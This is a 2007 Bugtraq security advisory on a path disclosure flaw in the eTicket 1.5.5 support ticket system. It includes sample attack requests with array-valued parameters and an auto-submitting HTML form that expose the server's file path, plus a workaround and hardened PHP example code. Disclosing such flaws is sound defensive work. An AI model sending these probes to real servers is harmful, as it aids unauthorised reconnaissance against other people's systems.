
List:       bugtraq
Subject:    eTicket version 1.5.5 Path Disclosure Vulnerability
From:       securityresearch () netvigilance ! com
Date:       2007-06-27 21:04:15
Message-ID: 20070627210415.12041.qmail () securityfocus ! com

netVigilance Security Advisory #30
eTicket version 1.5.5 Path Disclosure Vulnerability
Description:
eTicket is an open source electronic support ticket system based on osTicket. It can receive tickets via email (POP3 or pipe) and a web-based form, and lets staff manage them through a web interface.

External References:
Mitre CVE:  CVE-2007-2800
NVD NIST: CVE-2007-2800
OSVDB: 34785

Summary: 
eTicket is an electronic (open source) support ticket system based on osTicket.
A security problem in the product allows remote, unauthenticated attackers to obtain the full server-side filesystem path of the affected script.

Advisory URL: 
http://www.netvigilance.com/advisory0030
Release Date:
06/27/2007

Severity:
Risk: Low
 
CVSS Metrics:
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None 
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: Path disclosure

SecureScout Testcase ID:
TC 17960
 
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
Program flaws - The product scripts pass unvalidated request parameters to PHP functions, which emit warnings that include the script's full path.

Vendor:
HM2K

Vendor Status: 
HM2K from eTicket received the draft advisory on 21 May 2007 and received extensive support on how to fix the security problems on 23 May 2007 and 28 May 2007. In HM2K's own words, HM2K "lost interest" and "seriously found it too difficult to orchestrate what you [netVigilance] were asking from me [HM 2K], so I just did what I thought was best.". netVigilance's tests show that version 1.5.5.1 is also vulnerable. There is currently no official fix for this advisory.
Workaround:
Disable the display of warning messages to clients. In php.ini, set the following directive:
display_errors = Off
Example: 
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1
OR (works against version 1.5.5 and also against the new version 1.5.5.1):

Create a file (example.html) with the following content:
"
<html>
<body onLoad="document.forms[0].submit();">
<form action="http://[TARGET]/[PRODUCT FOLDER]/index.php" method="POST">
<input type="hidden" name="name[]" value="1">
<input type="hidden" name="email[]" value="1">
<input type="hidden" name="phone[]" value="1">
<input type="hidden" name="subject[]" value="1">
</form>
</body>
</html>
"
Then load it in any web browser.
REPLY:
<b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in <b>[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php</b> on line <b>[18 OR 26 OR 31 OR 51 OR 55]</b><br />
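The root cause shown above is that PHP decodes a parameter submitted as `name[]=1` into an array, and the script hands that array straight to htmlspecialchars(), which emits a warning containing the script's full path whenever display_errors is on. The following is an added example written for this advisory, not eTicket's own code, showing the hardened handling a maintainer would want: the runtime equivalent of the php.ini workaround, plus a type check so the warning is never triggered in the first place. The helper names request_string() and escape_field(), and the sample request, are constructed for illustration; the field names are the ones listed in the advisory.

```php
<?php
// Added example (not eTicket code): hardened handling of the form fields that
// the advisory shows being passed unchecked to htmlspecialchars().

// Hardening 1: mirror the advisory's php.ini workaround at runtime. Warnings are
// logged for the administrator but never rendered into the HTTP response, so a
// stray warning cannot leak the script path to a client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Hardening 2: fetch a request parameter as a string, or return $default when the
 * key is missing or not a scalar. A parameter submitted as name[]=1 arrives as an
 * array, which htmlspecialchars() rejects with a warning; this rejects it silently.
 */
function request_string(array $source, string $key, string $default = ''): string
{
    if (!array_key_exists($key, $source)) {
        return $default;
    }
    $value = $source[$key];
    if (!is_scalar($value)) {
        return $default;
    }
    return (string) $value;
}

/** HTML-escape a validated field; safe to call for any shape of input. */
function escape_field(array $source, string $key): string
{
    return htmlspecialchars(request_string($source, $key), ENT_QUOTES, 'UTF-8');
}

// Constructed request: three fields sent with [] (decoded to arrays, as in the
// advisory) and one ordinary scalar value for contrast. In a real script this
// would be $_GET or $_POST.
$constructed_request = [
    'name'    => ['1'],
    'email'   => ['1'],
    'phone'   => ['1'],
    'subject' => 'Printer <broken>',
];

foreach (['name', 'email', 'phone', 'subject'] as $field) {
    printf("%s => '%s'\n", $field, escape_field($constructed_request, $field));
}
```

With this in place the three array-valued fields fall back to the empty string and the scalar subject is escaped normally, and no warning is raised at all. The ini_set() calls are defence in depth: the type check removes this particular trigger, but keeping display_errors off means any other unanticipated warning also stays out of the response.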
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com